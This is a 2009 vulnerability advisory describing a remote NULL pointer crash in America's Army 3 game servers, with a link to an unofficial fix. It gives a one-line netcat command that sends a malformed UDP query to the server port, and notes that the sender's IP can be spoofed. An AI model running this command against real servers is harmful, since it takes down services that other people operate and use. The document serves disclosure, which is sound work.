####################################################################### Luigi Auriemma Application: America's Army 3 http://www.americasarmy.com/aa3.php Versions: <= 3.0.4 Platforms: Windows Bug: NULL pointer Exploitation: remote, versus server Date: 06 Jul 2009 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== America's Army 3 (AA3) is the new free game of the AA series developed for the U.S. Army as an help with the military recruitments. Released about 20 days ago it's already played by thousands of players and with more than 400 online servers (http://login.aa3.americasarmy.com/servers). ####################################################################### ====== 2) Bug ====== Differently than the older version AA3 has introduced a new proprietary type of query used for retrieving informations from the servers. The reply received from the servers is compressed and contains many informations (included the IP addresses of the clients... mah). The job of parsing such query is performed by the acpu_decompile function in libaa3.dll which returns a pointer to a new allocated structure which is then used internally by the game. Using an invalid type of query (for example one which doesn't start with the 0x6fe1 value) is possible to force this function to fail with the result of returing a NULL pointer instead of the pointer to the new data and with the consequence of the crash of the entire server due to the lack of checks. Only one single UDP packet is needed to exploit the vulnerability so without limitations and with the possibility for the attacker of spoofing the own IP address. ####################################################################### =========== 3) The Code =========== echo blah | nc SERVER 39300 -v -v -u note: instead the LAN servers use port 9002 ####################################################################### ====== 4) Fix ====== No fix. I have released an unofficial fix for the latest known server's version available in the moment I'm writing: http://aluigi.org/patches/aa3blahfix.lpatch #######################################################################